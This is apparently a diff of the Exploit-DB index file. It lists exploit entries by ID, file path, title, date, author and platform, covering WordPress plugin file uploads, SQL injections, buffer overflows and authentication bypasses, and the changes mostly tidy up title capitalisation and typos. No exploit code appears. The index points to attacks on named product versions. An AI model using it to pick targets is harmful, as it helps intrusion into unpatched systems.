FORGIT",php,webapps,0 -19023,platforms/php/webapps/19023.php,"Wordpress wpStoreCart Plugin 2.5.27-2.5.29 - Arbitrary File Upload",2012-06-08,"Sammy FORGIT",php,webapps,0 +19018,platforms/php/webapps/19018.txt,"WordPress Plugin: NewsLetter 1.5 - Remote File Disclosure",2012-06-08,"Sammy FORGIT",php,webapps,0 +19019,platforms/php/webapps/19019.php,"WordPress RBX Gallery Plugin 2.1 - Arbitrary File Upload",2012-06-08,"Sammy FORGIT",php,webapps,0 +19020,platforms/php/webapps/19020.txt,"WordPress Simple Download Button ShortCode Plugin 1.0 - Remote File Disclosure",2012-06-08,"Sammy FORGIT",php,webapps,0 +19021,platforms/php/webapps/19021.txt,"WordPress Thinkun Remind Plugin 1.1.3 - Remote File Disclosure",2012-06-08,"Sammy FORGIT",php,webapps,0 +19022,platforms/php/webapps/19022.txt,"WordPress Tinymce Thumbnail Gallery Plugin 1.0.7 - Remote File Disclosure",2012-06-08,"Sammy FORGIT",php,webapps,0 +19023,platforms/php/webapps/19023.php,"WordPress wpStoreCart Plugin 2.5.27-2.5.29 - Arbitrary File Upload",2012-06-08,"Sammy FORGIT",php,webapps,0 19011,platforms/php/webapps/19011.txt,"Webspell FIRSTBORN Movie-Addon - Blind SQL Injection",2012-06-08,"Easy Laster",php,webapps,0 19028,platforms/linux/remote/19028.txt,"Berkeley Sendmail 5.58 - DEBUG",1988-08-01,anonymous,linux,remote,0 19031,platforms/php/webapps/19031.txt,"Webspell dailyinput Movie Addon 4.2.x - SQL Injection",2012-06-10,"Easy Laster",php,webapps,0 19033,platforms/windows/remote/19033.txt,"Microsoft IIS 6.0 / 7.5 (+ PHP) - Multiple Vulnerabilities",2012-06-10,kingcope,windows,remote,0 -19034,platforms/windows/dos/19034.cpp,"PEamp - (.mp3) Memory Corruption (PoC)",2012-06-10,Ayrbyte,windows,dos,0 +19034,platforms/windows/dos/19034.cpp,"PEamp - '.mp3' Memory Corruption (PoC)",2012-06-10,Ayrbyte,windows,dos,0 19035,platforms/php/webapps/19035.txt,"freepost 0.1 r1 - Multiple Vulnerabilities",2012-06-10,"ThE g0bL!N",php,webapps,0 -19036,platforms/php/webapps/19036.php,"Wordpress Content Flow 3D Plugin 1.0.0 - Arbitrary File Upload",2012-06-10,g11tch,php,webapps,0 +19036,platforms/php/webapps/19036.php,"WordPress Content Flow 3D Plugin 1.0.0 - Arbitrary File Upload",2012-06-10,g11tch,php,webapps,0 19037,platforms/windows/local/19037.rb,"Microsoft Office - ClickOnce Unsafe Object Package Handling (MS12-005)",2012-06-11,Metasploit,windows,local,0 19038,platforms/php/webapps/19038.rb,"Symantec Web Gateway 5.0.2.8 - Arbitrary PHP File Upload",2012-06-10,Metasploit,php,webapps,0 19039,platforms/bsd/remote/19039.txt,"BSD 4.2 fingerd - Buffer Overflow",1988-10-01,anonymous,bsd,remote,0 @@ -16456,15 +16457,15 @@ id,file,description,date,author,platform,type,port 19047,platforms/aix/remote/19047.txt,"Stalker Internet Mail Server 1.6 - Buffer Overflow",2001-09-12,"David Luyer",aix,remote,0 19048,platforms/aix/remote/19048.txt,"IRIX 6.4 - pfdisplay.cgi",1998-04-07,"J.A. Gutierrez",aix,remote,0 19049,platforms/aix/dos/19049.txt,"BSDI 4.0 tcpmux / inetd - Crash",1998-04-07,"Mark Schaefer",aix,dos,0 -19050,platforms/php/webapps/19050.txt,"Wordpress wp-gpx-map 1.1.21 Plugin - Arbitrary File Upload",2012-06-11,"Adrien Thierry",php,webapps,0 +19050,platforms/php/webapps/19050.txt,"WordPress wp-gpx-map 1.1.21 Plugin - Arbitrary File Upload",2012-06-11,"Adrien Thierry",php,webapps,0 19051,platforms/php/webapps/19051.txt,"ClanSuite 2.9 - Arbitrary File Upload",2012-06-11,"Adrien Thierry",php,webapps,0 -19052,platforms/php/webapps/19052.txt,"Wordpress User Meta 1.1.1 Plugin - Arbitrary File Upload",2012-06-11,"Adrien Thierry",php,webapps,0 -19053,platforms/php/webapps/19053.txt,"Wordpress Top Quark Architecture 2.10 Plugin - Arbitrary File Upload",2012-06-11,"Adrien Thierry",php,webapps,0 -19054,platforms/php/webapps/19054.txt,"Wordpress SfBrowser 1.4.5 Plugin - Arbitrary File Upload",2012-06-11,"Adrien Thierry",php,webapps,0 -19055,platforms/php/webapps/19055.txt,"Wordpress Pica Photo Gallery 1.0 - Arbitrary File Upload",2012-06-11,"Adrien Thierry",php,webapps,0 -19056,platforms/php/webapps/19056.txt,"Wordpress Mac Photo Gallery 2.7 Plugin - Arbitrary File Upload",2012-06-11,"Adrien Thierry",php,webapps,0 -19057,platforms/php/webapps/19057.txt,"Wordpress drag and drop file upload 0.1 Plugin - Arbitrary File Upload",2012-06-11,"Adrien Thierry",php,webapps,0 -19058,platforms/php/webapps/19058.txt,"Wordpress Custom Content Type Manager 0.9.5.13-pl Plugin - Arbitrary File Upload",2012-06-11,"Adrien Thierry",php,webapps,0 +19052,platforms/php/webapps/19052.txt,"WordPress User Meta 1.1.1 Plugin - Arbitrary File Upload",2012-06-11,"Adrien Thierry",php,webapps,0 +19053,platforms/php/webapps/19053.txt,"WordPress Top Quark Architecture 2.10 Plugin - Arbitrary File Upload",2012-06-11,"Adrien Thierry",php,webapps,0 +19054,platforms/php/webapps/19054.txt,"WordPress SfBrowser 1.4.5 Plugin - Arbitrary File Upload",2012-06-11,"Adrien Thierry",php,webapps,0 +19055,platforms/php/webapps/19055.txt,"WordPress Pica Photo Gallery 1.0 - Arbitrary File Upload",2012-06-11,"Adrien Thierry",php,webapps,0 +19056,platforms/php/webapps/19056.txt,"WordPress Mac Photo Gallery 2.7 Plugin - Arbitrary File Upload",2012-06-11,"Adrien Thierry",php,webapps,0 +19057,platforms/php/webapps/19057.txt,"WordPress drag and drop file upload 0.1 Plugin - Arbitrary File Upload",2012-06-11,"Adrien Thierry",php,webapps,0 +19058,platforms/php/webapps/19058.txt,"WordPress Custom Content Type Manager 0.9.5.13-pl Plugin - Arbitrary File Upload",2012-06-11,"Adrien Thierry",php,webapps,0 19059,platforms/php/webapps/19059.php,"Agora-Project 2.12.11 - Arbitrary File Upload",2012-06-11,Misa3l,php,webapps,0 19060,platforms/php/webapps/19060.php,"TheBlog 2.0 - Multiple Vulnerabilities",2012-06-11,WhiteCollarGroup,php,webapps,0 19066,platforms/irix/local/19066.txt,"SGI IRIX 5.3/6.2 & SGI license_oeo 1.0 LicenseManager - NETLS_LICENSE_FILE",1996-04-05,"Arthur Hagen",irix,local,0 @@ -16473,11 +16474,11 @@ id,file,description,date,author,platform,type,port 19065,platforms/php/webapps/19065.rb,"Symantec Web Gateway 5.0.2.8 - ipchange.php Command Injection",2012-06-12,Metasploit,php,webapps,0 19068,platforms/unix/local/19068.txt,"Digital UNIX 4.0/4.0 B/4.0 D - SUID/SGID Core File",1998-04-06,"ru5ty and SoReN",unix,local,0 19069,platforms/linux/remote/19069.txt,"Qualcomm Eudora Internet Mail Server 1.2 - Buffer Overflow",1998-04-14,"Netstat Webmaster",linux,remote,0 -19070,platforms/linux/local/19070.txt,"Slackware Linux 3.4 - liloconfig-color temporary file",1998-04-06,neonhaze,linux,local,0 -19071,platforms/linux/local/19071.txt,"Slackware Linux 3.4 - makebootdisk temporary file",1998-04-06,neonhaze,linux,local,0 +19070,platforms/linux/local/19070.txt,"Slackware Linux 3.4 - liloconfig-color Temporary file",1998-04-06,neonhaze,linux,local,0 +19071,platforms/linux/local/19071.txt,"Slackware Linux 3.4 - makebootdisk Temporary file",1998-04-06,neonhaze,linux,local,0 19072,platforms/linux/local/19072.txt,"ISC BIND 4.9.7 -T1B - named SIGINT and SIGIOT symlink",1998-04-10,"Joe H",linux,local,0 -19073,platforms/linux/local/19073.txt,"Slackware Linux 3.4 - netconfig temporary file",1998-04-06,neonhaze,linux,local,0 -19074,platforms/linux/local/19074.txt,"Slackware Linux 3.4 - pkgtool temporary file",1998-04-06,neonhaze,linux,local,0 +19073,platforms/linux/local/19073.txt,"Slackware Linux 3.4 - netconfig Temporary file",1998-04-06,neonhaze,linux,local,0 +19074,platforms/linux/local/19074.txt,"Slackware Linux 3.4 - pkgtool Temporary file",1998-04-06,neonhaze,linux,local,0 19075,platforms/linux/dos/19075.c,"APC PowerChute Plus 4.2.2 - Denial of Service",1998-04-10,Schlossnagle,linux,dos,0 19076,platforms/linux/remote/19076.txt,"Apple Personal Web Sharing 1.1 - Exploit",1998-04-10,"Netstat Webmaster",linux,remote,0 19077,platforms/linux/local/19077.c,"Fred N. van Kempen dip 3.3.7 - Buffer Overflow (1)",1998-05-05,jamez,linux,local,0 @@ -16491,17 +16492,17 @@ id,file,description,date,author,platform,type,port 19085,platforms/linux/dos/19085.c,"Linux Kernel 2.0 / 2.1 - Send a SIGIO Signal To Any Process",1998-06-30,"David Luyer",linux,dos,0 19086,platforms/linux/remote/19086.c,"WU-FTPD 2.4.2 & SCO Open Server 5.0.5 & ProFTPd 1.2 pre1 - realpath Exploit (1)",1999-02-09,"smiler and cossack",linux,remote,21 19087,platforms/linux/remote/19087.c,"WU-FTPD 2.4.2 & SCO Open Server 5.0.5 & ProFTPd 1.2 pre1 - realpath Exploit (2)",1999-02-09,"jamez and c0nd0r",linux,remote,21 -19089,platforms/windows/dos/19089.txt,"Windows OpenType Font - File Format Denial of Service",2012-06-12,Cr4sh,windows,dos,0 +19089,platforms/windows/dos/19089.txt,"Microsoft Windows OpenType Font - File Format Denial of Service",2012-06-12,Cr4sh,windows,dos,0 19091,platforms/hardware/remote/19091.py,"F5 BIG-IP - Remote Root Authentication Bypass (2)",2012-06-12,"David Kennedy (ReL1K)",hardware,remote,0 19092,platforms/multiple/remote/19092.py,"MySQL - Remote Root Authentication Bypass",2012-06-12,"David Kennedy (ReL1K)",multiple,remote,0 19093,platforms/multiple/remote/19093.txt,"Allaire ColdFusion Server 4.0 - Remote File Display / Deletion / Upload / Execution",1998-12-25,rain.forest.puppy,multiple,remote,0 -19094,platforms/windows/remote/19094.txt,"Microsoft Internet Explorer 4.0/5.0 - DHTML Edit ActiveX Control File Stealing and Cross Frame Access",1999-04-22,"Georgi Guninsky",windows,remote,0 +19094,platforms/windows/remote/19094.txt,"Microsoft Internet Explorer 4/5 - DHTML Edit ActiveX Control File Stealing and Cross Frame Access",1999-04-22,"Georgi Guninsky",windows,remote,0 19095,platforms/linux/local/19095.txt,"GNU GNU bash 1.14 - Path Embedded Code Execution",1999-04-20,Shadow,linux,local,0 19096,platforms/linux/remote/19096.c,"RedHat Linux 5.1 & Caldera OpenLinux Standard 1.2 - Mountd",1998-08-28,LucySoft,linux,remote,0 19154,platforms/php/webapps/19154.py,"qdPM 7 - Arbitrary File upload",2012-06-14,loneferret,php,webapps,0 -19098,platforms/multiple/dos/19098.txt,"Apple iTunes 10.6.1.7 - .m3u Playlist File Walking Heap Buffer Overflow",2012-06-13,LiquidWorm,multiple,dos,0 +19098,platforms/multiple/dos/19098.txt,"Apple iTunes 10.6.1.7 - '.m3u' Playlist File Walking Heap Buffer Overflow",2012-06-13,LiquidWorm,multiple,dos,0 19099,platforms/hardware/remote/19099.rb,"F5 BIG-IP - SSH Private Key Exposure",2012-06-13,Metasploit,hardware,remote,0 -19100,platforms/php/webapps/19100.rb,"Wordpress Plugin Foxypress - uploadify.php Arbitrary Code Execution",2012-06-13,Metasploit,php,webapps,0 +19100,platforms/php/webapps/19100.rb,"WordPress Plugin Foxypress - Uploadify.php Arbitrary Code Execution",2012-06-13,Metasploit,php,webapps,0 19101,platforms/unix/remote/19101.c,"Xi Graphics Maximum CDE 1.2.3 & TriTeal TED CDE 4.3 & Sun Solaris 2.5.1 - ToolTalk RPC Service Overflow (1)",1998-08-31,"NAI research team",unix,remote,0 19102,platforms/unix/remote/19102.c,"Xi Graphics Maximum CDE 1.2.3 / TriTeal TED CDE 4.3 / Sun Solaris 2.5.1 - ToolTalk RPC Service Overflow (2)",1998-08-31,"NAI research team",unix,remote,0 19103,platforms/linux/remote/19103.c,"HP HP-UX 10.34 / ms Windows 95/NT 3.5.1 SP1/NT 3.5.1 SP2/NT 3.5.1 SP3/NT 3.5.1 SP4/NT 4.0/NT 4.0 SP1/NT 4.0 SP2/NT 4.0 SP3 - Denial of Service",1997-11-13,"G P R",linux,remote,0 @@ -16516,7 +16517,7 @@ id,file,description,date,author,platform,type,port 19112,platforms/linux/remote/19112.c,"Multiple OSes - BIND Buffer Overflow (2)",1998-04-08,prym,linux,remote,0 19113,platforms/windows/remote/19113.txt,"Microsoft Windows NT 3.5.1 SP2/3.5.1 SP3/3.5.1 SP4/3.5.1 SP5/4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 - TelnetD",1999-01-02,"Tomas Halgas",windows,remote,23 19386,platforms/php/webapps/19386.txt,"UCCASS 1.8.1 - Blind SQL Injection",2012-06-24,dun,php,webapps,0 -19385,platforms/windows/dos/19385.txt,"IrfanView 4.33 - .DJVU Image Processing Heap Overflow",2012-06-24,"Francis Provencher",windows,dos,0 +19385,platforms/windows/dos/19385.txt,"Irfanview 4.33 - '.DJVU' Image Processing Heap Overflow",2012-06-24,"Francis Provencher",windows,dos,0 19117,platforms/linux/dos/19117.c,"Linux Kernel 2.0/2.1 (Digital UNIX 4.0 D / FreeBSD 2.2.4 / HP HP-UX 10.20/11.0 / IBM AIX 3.2.5 / NetBSD 1.2 / Solaris 2.5.1) - Smurf Denial of Service",1998-01-05,"T. Freak",linux,dos,0 19118,platforms/multiple/remote/19118.txt,"Microsoft IIS 3.0/4.0 / Microsoft Personal Web Server 2.0/3.0/4.0 - ASP Alternate Data Streams",1998-01-01,"Paul Ashton",multiple,remote,0 19119,platforms/linux/remote/19119.c,"HP HP-UX 10.34 rlpdaemon - Exploit",1998-07-06,"RSI Advise",linux,remote,0 @@ -16536,21 +16537,21 @@ id,file,description,date,author,platform,type,port 19133,platforms/php/webapps/19133.txt,"Cells Blog CMS 1.1 - Multiple Web Vulnerabilities",2012-06-14,Vulnerability-Lab,php,webapps,0 19134,platforms/php/webapps/19134.txt,"Swoopo Gold Shop CMS 8.4.56 - Multiple Web Vulnerabilities",2012-06-14,Vulnerability-Lab,php,webapps,0 19135,platforms/php/webapps/19135.txt,"Squirrelcart Cart Shop 3.3.4 - Multiple Web Vulnerabilities",2012-06-14,Vulnerability-Lab,php,webapps,0 -19137,platforms/hardware/dos/19137.rb,"Wyse - Machine Remote Power off (DOS) without any privilege (Metasploit)",2012-06-14,it.solunium,hardware,dos,0 +19137,platforms/hardware/dos/19137.rb,"Wyse - Machine Remote Power off (DOS) without any Privilege (Metasploit)",2012-06-14,it.solunium,hardware,dos,0 19138,platforms/windows/local/19138.txt,"ESRI ArcGIS 10.0.x / ArcMap 9 - Arbitrary Code Execution",2012-06-14,"Boston Cyber Defense",windows,local,0 19139,platforms/multiple/local/19139.py,"Adobe Illustrator CS5.5 - Memory Corruption Exploit",2012-06-14,"Felipe Andres Manzano",multiple,local,0 19141,platforms/windows/remote/19141.rb,"Microsoft Internet Explorer - Same ID Property Deleted Object Handling Memory Corruption (MS12-037)",2012-06-14,Metasploit,windows,remote,0 19142,platforms/linux/local/19142.sh,"Oracle 8 - File Access",1999-05-06,"Kevin Wenchel",linux,local,0 -19143,platforms/windows/local/19143.c,"Microsoft Windows - 'April Fools 2001'",1999-01-07,"Richard M. Smith",windows,local,0 +19143,platforms/windows/local/19143.c,"Microsoft Windows - 'April Fools 2001' Exploit",1999-01-07,"Richard M. Smith",windows,local,0 19144,platforms/windows/local/19144.txt,"Microsoft Zero Administration Kit (ZAK) 1.0 and Office97 - Backdoor",1999-01-07,"Satu Laksela",windows,local,0 -19145,platforms/windows/local/19145.c,"Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4 - Server Operator to Administrator Privilege Escalation: System Key",1999-01-11,Mnemonix,windows,local,0 -19146,platforms/linux/local/19146.sh,"DataLynx suGuard 1.0 - Expoit",1999-01-03,"Dr. Mudge",linux,local,0 -19147,platforms/windows/remote/19147.txt,"NT IIS4 - Remote Web-Based Administration",1999-01-14,Mnemonix,windows,remote,0 -19149,platforms/windows/remote/19149.c,"NT IIS4 - Log Avoidance",1999-01-22,Mnemonix,windows,remote,0 +19145,platforms/windows/local/19145.c,"Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4 - Server Operator to Administrator Privilege Escalation: System Key",1999-01-11,Mnemonix,windows,local,0 +19146,platforms/linux/local/19146.sh,"DataLynx suGuard 1.0 - Exploit",1999-01-03,"Dr. Mudge",linux,local,0 +19147,platforms/windows/remote/19147.txt,"Microsoft IIS4 (Windows NT) - Remote Web-Based Administration",1999-01-14,Mnemonix,windows,remote,0 +19149,platforms/windows/remote/19149.c,"Microsoft IIS4 (Windows NT) - Log Avoidance",1999-01-22,Mnemonix,windows,remote,0 19152,platforms/windows/remote/19152.txt,"Microsoft IIS 5.0 - IISAPI Extension Enumerate Root Web Server Directory",1999-01-26,Mnemonix,windows,remote,0 19387,platforms/windows/remote/19387.rb,"Apple iTunes 10 - Extended M3U Stack Buffer Overflow",2012-06-25,Metasploit,windows,remote,0 19156,platforms/windows/remote/19156.txt,"Microsoft Internet Explorer 5.0.1 - Invalid Byte Cross-Frame Access",1999-01-28,"Georgi Guninski",windows,remote,0 -19413,platforms/windows/dos/19413.c,"Windows 95/98 / Windows NT Enterprise Server 4.0 SP5 / Windows NT Terminal Server 4.0 SP4 / Windows NT Workstation 4.0 SP5 - Exploit (1)",1999-07-03,Coolio,windows,dos,0 +19413,platforms/windows/dos/19413.c,"Microsoft Windows 95/98 / Windows NT Enterprise Server 4.0 SP5 / Windows NT Terminal Server 4.0 SP4 / Windows NT Workstation 4.0 SP5 - Exploit (1)",1999-07-03,Coolio,windows,dos,0 19391,platforms/windows/dos/19391.py,"Slimpdf Reader 1.0 - Memory Corruption",2012-06-25,"Carlos Mario Penagos Hollmann",windows,dos,0 19392,platforms/windows/dos/19392.py,"Able2Extract and Able2Extract Server 6.0 - Memory Corruption",2012-06-25,"Carlos Mario Penagos Hollmann",windows,dos,0 19158,platforms/solaris/local/19158.c,"Sun Solaris 2.5.1 PAM & unix_scheme - Exploit",1997-02-25,"Cristian Schipor",solaris,local,0 @@ -16559,25 +16560,25 @@ id,file,description,date,author,platform,type,port 19161,platforms/solaris/local/19161.txt,"Solaris 2.5.1 Ping - Exploit",1997-06-15,"Adam Caldwell",solaris,local,0 19402,platforms/hardware/remote/19402.txt,"Western Digital's WD TV Live SMP/Hub - Root Exploit",2012-06-26,"Wolfgang Borst",hardware,remote,0 19163,platforms/irix/local/19163.sh,"SGI IRIX 6.4 ioconfig - Exploit",1998-07-20,Loneguard,irix,local,0 -19164,platforms/windows/remote/19164.txt,"Microsoft IE4 - Clipboard Paste",1999-01-21,"Juan Carlos Garcia Cuartango",windows,remote,0 +19164,platforms/windows/remote/19164.txt,"Microsoft Internet Explorer 4 - Clipboard Paste",1999-01-21,"Juan Carlos Garcia Cuartango",windows,remote,0 19167,platforms/windows/local/19167.txt,"Ipswitch IMail 5.0 / WS_FTP Server 1.0.1/1.0.2 - Privilege Escalation",1999-02-04,Marc,windows,local,0 19168,platforms/unix/local/19168.sh,"SGI IRIX 6.5.4 / Solaris 2.5.1 - ps(1) Buffer Overflow",1997-04-28,"Joe Zbiciak",unix,local,0 19172,platforms/unix/local/19172.c,"BSD/OS 2.1 / DG/UX 7.0 / Debian Linux 1.3 / HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.4 / Solaris 2.5.1 - xlock Exploit (1)",1997-04-26,cesaro,unix,local,0 19173,platforms/unix/local/19173.c,"BSD/OS 2.1 / DG/UX 7.0 / Debian Linux 1.3 / HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.4 / Solaris 2.5.1 - xlock Exploit (2)",1997-04-26,BeastMaster,unix,local,0 -19174,platforms/php/webapps/19174.py,"Useresponse 1.0.2 - Privilege Escalation / Remote Code Execution Exploit",2012-06-15,mr_me,php,webapps,0 +19174,platforms/php/webapps/19174.py,"Useresponse 1.0.2 - Privilege Escalation / Remote Code Execution",2012-06-15,mr_me,php,webapps,0 19175,platforms/windows/local/19175.rb,"Lattice Semiconductor PAC-Designer 6.21 - Symbol Value Buffer Overflow",2012-06-17,Metasploit,windows,local,0 19176,platforms/windows/local/19176.rb,"TFM MMPlayer - '.m3u' / '.ppl' Buffer Overflow",2012-06-15,Metasploit,windows,local,0 19177,platforms/windows/remote/19177.rb,"ComSndFTP 1.3.7 Beta - USER Format String (Write4)",2012-06-15,Metasploit,windows,remote,0 19178,platforms/php/webapps/19178.txt,"webo site speedup 1.6.1 - Multiple Vulnerabilities",2012-06-16,dun,php,webapps,0 19179,platforms/php/webapps/19179.txt,"PHP Decoda 3.3.1 - Local File Inclusion",2012-06-16,"Number 7",php,webapps,0 19180,platforms/php/webapps/19180.txt,"News Script PHP 1.2 - Multiple Vulnerabilities",2012-06-16,Vulnerability-Lab,php,webapps,0 -19181,platforms/windows/dos/19181.txt,"XnView - .RAS Image Processing Heap Overflow",2012-06-16,"Francis Provencher",windows,dos,0 -19182,platforms/windows/dos/19182.txt,"XnView - .ECW Image Processing Heap Overflow",2012-06-16,"Francis Provencher",windows,dos,0 -19183,platforms/windows/dos/19183.txt,"XnView - .FlashPix Image Processing Heap Overflow",2012-06-16,"Francis Provencher",windows,dos,0 +19181,platforms/windows/dos/19181.txt,"XnView - '.RAS' Image Processing Heap Overflow",2012-06-16,"Francis Provencher",windows,dos,0 +19182,platforms/windows/dos/19182.txt,"XnView - '.ECW' Image Processing Heap Overflow",2012-06-16,"Francis Provencher",windows,dos,0 +19183,platforms/windows/dos/19183.txt,"XnView - '.FlashPix' Image Processing Heap Overflow",2012-06-16,"Francis Provencher",windows,dos,0 19184,platforms/windows/dos/19184.pl,"Karafun Player 1.20.86 - '.m3u' Crash (PoC)",2012-06-16,Styxosaurus,windows,dos,0 19185,platforms/hardware/webapps/19185.txt,"Huawei HG866 - Authentication Bypass",2012-06-16,hkm,hardware,webapps,0 19186,platforms/windows/remote/19186.rb,"Microsoft XML Core Services - MSXML Uninitialized Memory Corruption",2012-06-16,Metasploit,windows,remote,0 -19187,platforms/php/webapps/19187.txt,"Wordpress Automatic Plugin 2.0.3 - SQL Injection",2012-06-16,nick58,php,webapps,0 +19187,platforms/php/webapps/19187.txt,"WordPress Automatic Plugin 2.0.3 - SQL Injection",2012-06-16,nick58,php,webapps,0 19188,platforms/php/webapps/19188.txt,"Nuked Klan SP CMS 4.5 - SQL Injection",2012-06-16,Vulnerability-Lab,php,webapps,0 19189,platforms/php/webapps/19189.txt,"iScripts EasyCreate CMS 2.0 - Multiple Vulnerabilities",2012-06-16,Vulnerability-Lab,php,webapps,0 19389,platforms/windows/dos/19389.txt,"Kingview Touchview 6.53 - Multiple Heap Overflow Vulnerabilities",2012-06-25,"Carlos Mario Penagos Hollmann",windows,dos,0 @@ -16612,7 +16613,7 @@ id,file,description,date,author,platform,type,port 19220,platforms/windows/local/19220.c,"Allaire ColdFusion Server 4.0.1 - CFCRYPT.EXE",1998-05-19,"Matt Chapman",windows,local,0 19221,platforms/multiple/remote/19221.txt,"SmartDesk WebSuite 2.1 - Buffer Overflow",1999-05-25,cmart,multiple,remote,0 19222,platforms/multiple/remote/19222.txt,"Gordano NTMail 4.2 - Web File Access",1999-05-25,Marc,multiple,remote,0 -19223,platforms/multiple/remote/19223.txt,"Floosietek FTGate 2.1 - Web File Access",1999-05-25,Marc,multiple,remote,0 +19223,platforms/multiple/remote/19223.txt,"FloosieTek FTGate 2.1 - Web File Access",1999-05-25,Marc,multiple,remote,0 19224,platforms/windows/remote/19224.c,"Computalynx CMail 2.3 - Web File Access",1999-05-25,Marc,windows,remote,0 19225,platforms/multiple/dos/19225.txt,"Compaq Client Management Agents 3.70/4.0 / Insight Management Agents 4.21 A/4.22 A/4.30 A / Intelligent Cluster Administrator 1.0 / Management Agents for Workstations 4.20 A / Server Management Agents 4.23 / Survey Utility 2.0 - Web File Access",1999-05-25,"Master Dogen",multiple,dos,0 19226,platforms/linux/remote/19226.c,"University of Washington pop2d 4.4 - Buffer Overflow",1999-05-26,"Chris Evans",linux,remote,0 @@ -16628,12 +16629,12 @@ id,file,description,date,author,platform,type,port 19236,platforms/solaris/remote/19236.txt,"Solaris 7.0 Coredump - Exploit",1996-08-03,"Jungseok Roh",solaris,remote,0 19237,platforms/aix/remote/19237.txt,"Gordano NTMail 3.0/5.0 - SPAM Relay",1999-06-08,Geo,aix,remote,0 19238,platforms/windows/dos/19238.txt,"Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3 - Denial of Service Duplicate Hostname",1999-06-04,"Carl Byington",windows,dos,0 -19239,platforms/windows/remote/19239.txt,"Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 - IIS IDC Path Mapping",1999-06-04,"Scott Danahy",windows,remote,0 +19239,platforms/windows/remote/19239.txt,"Microsoft IIS (Windows NT 4.0/SP1/SP2/SP3/SP4/SP5) - IIS IDC Path Mapping",1999-06-04,"Scott Danahy",windows,remote,0 19240,platforms/linux/local/19240.c,"Caldera kdenetwork 1.1.1-1 / Caldera OpenLinux 1.3/2.2 / KDE KDE 1.1/1.1. / RedHat Linux 6.0 - K-Mail File Creation",1999-06-09,"Brian Mitchell",linux,local,0 19241,platforms/linux/dos/19241.c,"Linux Kernel 2.2 / 2.3 / Debian Linux 2.1 / RedHat Linux 6.0 / S.u.S.E. Linux 6.1 - IP Options",1999-06-01,"Piotr Wilkin",linux,dos,0 19242,platforms/multiple/remote/19242.txt,"CdomainFree 2.4 - Remote Command Execution",1999-06-01,"Salvatore Sanfilippo -antirez-",multiple,remote,0 19243,platforms/linux/local/19243.txt,"G. Wilford man 2.3.10 - Symlink",1999-06-02,"Thomas Fischbacher",linux,local,0 -19244,platforms/osx/local/19244.sh,"Apple Mac OSX Server 10.0 - Overload",1999-06-03,"Juergen Schmidt",osx,local,0 +19244,platforms/osx/local/19244.sh,"Apple Mac OS X Server 10.0 - Overload",1999-06-03,"Juergen Schmidt",osx,local,0 19245,platforms/windows/remote/19245.pl,"Microsoft IIS 4.0 - Buffer Overflow (1)",1999-06-15,"eEye Digital Security Team",windows,remote,0 19246,platforms/windows/remote/19246.pm,"Microsoft IIS 4.0 - Buffer Overflow (2)",1999-06-15,Stinko,windows,remote,0 19247,platforms/linux/remote/19247.c,"Microsoft IIS 4.0 - Buffer Overflow (3)",1999-06-15,"eeye security",linux,remote,0 @@ -16641,21 +16642,21 @@ id,file,description,date,author,platform,type,port 19249,platforms/linux/local/19249.c,"Xcmail 0.99.6 - Exploit",1999-03-02,Arthur,linux,local,0 19250,platforms/linux/dos/19250.txt,"Linux Kernel 2.0 / 2.1 / 2.2 - autofs",1999-02-19,"Brian Jones",linux,dos,0 19251,platforms/linux/remote/19251.c,"tcpdump 3.4 - Protocol Four and Zero Header Length",1999-06-16,badi,linux,remote,0 -19401,platforms/windows/local/19401.txt,"Apple QuickTime - quicktime.util.QTByteObject Initialization Security Checks Bypass",2012-06-26,"Security Explorations",windows,local,0 +19401,platforms/windows/local/19401.txt,"Apple QuickTime - QuickTime.util.QTByteObject Initialization Security Checks Bypass",2012-06-26,"Security Explorations",windows,local,0 19253,platforms/linux/remote/19253.txt,"Debian Linux 2.1 - httpd",1999-06-17,anonymous,linux,remote,0 19254,platforms/linux/local/19254.c,"S.u.S.E. Linux 5.2 - gnuplot",1999-03-04,xnec,linux,local,0 19255,platforms/linux/local/19255.txt,"RedHat Linux 5.2 i386/6.0 - No Logging",1999-06-09,"Tani Hosokawa",linux,local,0 19256,platforms/linux/local/19256.c,"Stanford University bootpd 2.4.3 / Debian Linux 2.0 - netstd",1999-01-03,anonymous,linux,local,0 19257,platforms/linux/local/19257.c,"X11R6 3.3.3 - Symlink",1999-03-21,Stealthf0rk,linux,local,0 19258,platforms/solaris/local/19258.sh,"Sun Solaris 7.0 ff.core - Exploit",1999-01-07,"John McDonald",solaris,local,0 -19259,platforms/linux/local/19259.c,"S.u.S.E. 5.2 lpc - Exploi",1999-02-03,xnec,linux,local,0 +19259,platforms/linux/local/19259.c,"S.u.S.E. 5.2 lpc - Exploit",1999-02-03,xnec,linux,local,0 19260,platforms/irix/local/19260.sh,"SGI IRIX 6.2 - /usr/lib/netaddpr",1997-05-09,"Jaechul Choe",irix,local,0 19261,platforms/netbsd_x86/local/19261.txt,"NetBSD 1.3.2 / SGI IRIX 6.5.1 at(1) - Exploit",1998-06-27,Gutierrez,netbsd_x86,local,0 19262,platforms/irix/local/19262.txt,"SGI IRIX 6.2 cdplayer - Exploit",1996-11-21,"Yuri Volobuev",irix,local,0 19263,platforms/hardware/webapps/19263.txt,"QNAP Turbo NAS 3.6.1 Build 0302T - Multiple Vulnerabilities",2012-06-18,"Sense of Security",hardware,webapps,0 19264,platforms/php/webapps/19264.txt,"MyTickets 1.x < 2.0.8 - Blind SQL Injection",2012-06-18,al-swisre,php,webapps,0 19265,platforms/windows/dos/19265.py,"Total Video Player 1.31 - '.m3u' Crash (PoC)",2012-06-18,0dem,windows,dos,0 -19266,platforms/windows/remote/19266.py,"Ezhometech Ezserver 6.4 - Stack Overflow",2012-06-18,modpr0be,windows,remote,0 +19266,platforms/windows/remote/19266.py,"EZHomeTech Ezserver 6.4 - Stack Overflow",2012-06-18,modpr0be,windows,remote,0 19267,platforms/irix/local/19267.c,"SGI IRIX 6.3 - xrm Buffer Overflow",1997-05-27,"David Hedley",irix,local,0 19268,platforms/irix/local/19268.txt,"SGI IRIX 5.3 Cadmin - Exploit",1996-08-06,"Grant Kaufmann",irix,local,0 